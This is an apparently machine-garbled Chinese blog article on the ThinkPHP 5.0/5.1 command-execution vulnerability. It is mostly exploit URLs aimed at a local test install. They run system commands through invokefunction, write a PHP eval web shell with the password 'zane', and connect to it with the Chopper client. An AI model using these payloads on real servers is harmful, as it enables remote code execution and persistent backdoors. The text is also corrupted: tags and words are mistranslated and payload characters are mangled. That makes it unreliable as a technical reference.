thinkphp_5x_命令执行漏洞的示例分析

  介绍

这篇文章主要介绍thinkphp_5x_命令执行漏洞的示例分析,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!

<强> thinkphp_5x_命令执行漏洞

<强>受影响版本包括5.0和5.1版本

码头工人漏洞环境源码:https://github.com/vulnspy/thinkphp-5.1.29
<代码>
本地环境搭建:
thinkphp5.0.15 + php5.6n + apache2.0 http://www.thinkphp.cn/donate/download/id/1125.html
<代码>

EXP
<代码> http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think \ app/invokefunction&函数=call_user_func_array& var [0]=system& var [1] []=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
<代码> http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\ \ app/invokefunction&函数=call_user_func_array& var [0]=phpinfo& var[1][]=1

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\认为\ app/invokefunction&函数=call_user_func_array& var [0]=system& var [1] []=echo  ^ & lt; ? php  @eval ($ _POST [“zane"]) ? ^祝辞祝辞shell.php      或者      http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\认为\ app/invokefunction&函数=call_user_func_array& var [0]=file_put_contents& var [1] []=. ./test.php& var [1] []=FUCK<? php  @eval ($ _POST [“zane"]) ?在

使用菜刀连接
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell。php,密码为zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test。php,,,,密码为zane

以上是“thinkphp_5x_命令执行漏洞的示例分析”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注行业资讯频道!

thinkphp_5x_命令执行漏洞的示例分析